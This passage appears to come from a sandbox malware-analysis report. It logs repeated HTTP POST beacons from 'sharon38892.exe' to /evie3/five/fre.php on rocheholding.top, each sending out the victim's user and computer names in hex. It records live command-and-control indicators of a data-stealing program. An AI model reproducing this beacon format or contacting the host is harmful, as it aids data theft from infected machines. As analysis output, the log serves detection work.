May 23, 2024 20:18:26.225308895 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pyJs516rFD%2BECmbzvPdHl9MCwdH6ab6ZZfSy%2FesGNnVQyS5Xe6cfvgC3T7WdkU2CIjHjlB4TNH9Xc0oWetwnazAcqtvddepZv3QRuc0BelFeFjv4yGut1g40bRKp%2FhZ4XpRu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c67fbd1c356-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.22	49210	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:26.597771883 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:26.644923925 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:27.352135897 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgNv8xt6emlf2DKousDoL9sBWj7RJOUJXvQxyt0Txc0vNFB3tKHRxPlhmieeSBTGZX9gIZUNpmgSh9OM03Lc3doGNi6zvtWsI%2FBLch26b9%2BAUxo0173ocijKDTnHzAJPn375"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c6efe2e72a1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.22	49211	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:27.512891054 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:27.564429045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:28.221432924 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oq06SMb3xCBh6xCXXBVCggpS7h2lg%2BelT7O48iKRiJbdSjHm9DUc8Nj%2BjW4VkxnNnCyDwMVYwUF5IYR31hXQX7qpG3tmWxThdPt3%2FvGlPhYBAnbHRBLBGexh58W5K143IIdM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c7488ee4263-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.22	49212	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:28.376454115 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:28.429852962 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:29.124516010 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aedBF0RyWPgJ4cAB816%2BxY2%2Fly1U7B7Q%2B1spCXg%2FTcIPJdtxXzGRAPhkNNAvitIYSHw8XX7KLnCTuMN5eI4ZMUl8csUh5F6279YkW8JaY7%2BsVXDUezG1M0SRHwkAfSW2VXDR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c79e8ec43fb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.22	49213	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:29.294238091 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:29.348448992 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:29.934037924 CEST	621	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiIDfSTUutajvyZaYUVp84f7Xh5PWL2Gd9oy2SZuW3vswjd0IMae2LGe9LdA%2F3bqFevKsSSMoE7jEr9RSvZvMnSE25Uiyhmv2pVFQSyWD%2F4JAkgAnd9gnmz79whThzTKNEaw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c7fca041921-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.22	49214	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:30.098367929 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:30.149559975 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:30.812721968 CEST	633	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xD0tV2XrX8Is8TSWS%2BLSIKSbUY0LZ%2B2%2BZRKePwsJPNeDLb0YMObtRH0BMrDOMuUSRqWZarkhDNz6%2FmuGOvM45l6HcBzz%2Fui%2Fillix9CSrz%2BCmtGN%2BbS7CsIhbsgKX72yCfH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c84a9e842dd-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.22	49215	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:30.957361937 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:31.008379936 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:31.553235054 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilphZhoz1dVfbbipD95a%2FLd7ANxUE6rfinFkZrlxxyOo7VgLnQa7DkTy%2F0zkkNakggIKqwdUkjHEiH208yss2zrw1lADe8iFBEYNlxBIVSyeojCSPZIL0%2FB6pkRBK1TVVaeX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c8a0a591859-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.22	49216	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:31.712532043 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:31.764251947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:32.421569109 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UwrTWntmtW4R85fKpiS8ojLNif1lIUexa%2F0v3WNlrpy0x5BYnITgi5EvZ6BbbNTOhXTNC7U%2BBW7JqKWjkjM2rJNO6h%2F40zBhs3ne21qLjnuql4sIx%2FV%2FByqaCLGsTXQv5T9Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870c8eb97117ad-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.22	49217	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:37.677256107 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:37.737449884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:38.405973911 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehiBpDu%2FU8UgcX0XLOIigD3IhV1ekk1HohoLeO3lPU%2BobOh1Pho8F7Lyf3K35iETs%2B7YS5GPR0UfNQJuG83E9qGUsok3KHm1zezH2hdOZZ6G%2BFZZufLZWR0cvU3nDtotE2hE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cb41d1a420d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.22	49218	188.114.97.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:38.560339928 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:38.611571074 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:39.223416090 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltYz0bRtytArCayGcMZvBxLhtAhgWFzo65x%2BbOzEO%2FlYkIcpjApkQV55kJSirqSJGmQFN0dqr3zxF5UbFP7ZoUiPGKwvxIsp3X3DYte0CLfrOVCdsGM94AFcQkXqeFAs%2BHX6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cb9da01428f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.22	49219	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:39.381191015 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:39.439939022 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:40.118145943 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FfItQ2F28WMpohWRqYCVgraURiCR%2BlpL72e7vMBFKW6avO9%2Bd0fpt%2Bo90A0tL1p3tBK5IkJG0ISpCwVxvWz898UP5ifcJ13HiPac8r%2B%2BjTWaEuWJWxweev76EGx2Xoo%2F71N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cbecb0d4327-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.22	49220	188.114.97.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:40.275028944 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:40.324969053 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:41.062020063 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RHMKrWB524eoCYwj73JhkGJWEVm%2F%2Fku4SgEclTKdkhbrMBdmOmblCNHevtIJEoKNhSD8tWJYkfSuhb6iFB0UP0FOV7tYAWN6qIyZ92CT3TQqz%2BNdBFc2RqU%2BrpsrzNRrk19"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cc4ab3b7c6f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.22	49221	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:41.210685968 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:41.263561964 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:41.825371027 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3ehChHzN2B0Fs%2BlTA2ysZlOCrEAtqYIqaDDXfDGCbyXWQ6Xpact%2FeB%2FmHi4ZaeBfJb4Z37BGX6YNB8BGLnXoucVjhP4VGv5HzTj6H8CHUAMpPsVdE%2BBFWqkpEN%2BNH%2FnLFJV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cca1b051849-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.22	49222	188.114.96.9	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:41.981230974 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:42.035691977 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:42.757237911 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8zQe2OH0CR5QMw%2BjeNiAE9MezSOLxFFfo8nmSoNMZX0yQJSWnXAYiC6PTI95tcB%2FMixlt6H4eaqrZPtgJz0PsA5b6%2FUuT3sCBnh4z4Iyft6tzhGtu2FOQA62ZFQGeM7ChVe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870ccf1e4d726e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.22	49223	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:42.915751934 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:42.967454910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:18:43.629870892 CEST	633	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:18:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZN5B3ZVPk8C3pKRJ%2FGh7LuLJWG79z6%2Buc%2B9vRW5qe%2BM8rTbqpvFlPki4HNEpSI6F8nw%2BESbZ6rRoh7u%2FT6XL0at5MLet35tAHO6%2BKMil3W6pIOfS%2FAmBFRb3WxEfkGVJUxA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870cd4dec1421c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.22	49224	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:18:43.784657955 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:18:43.836149931 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
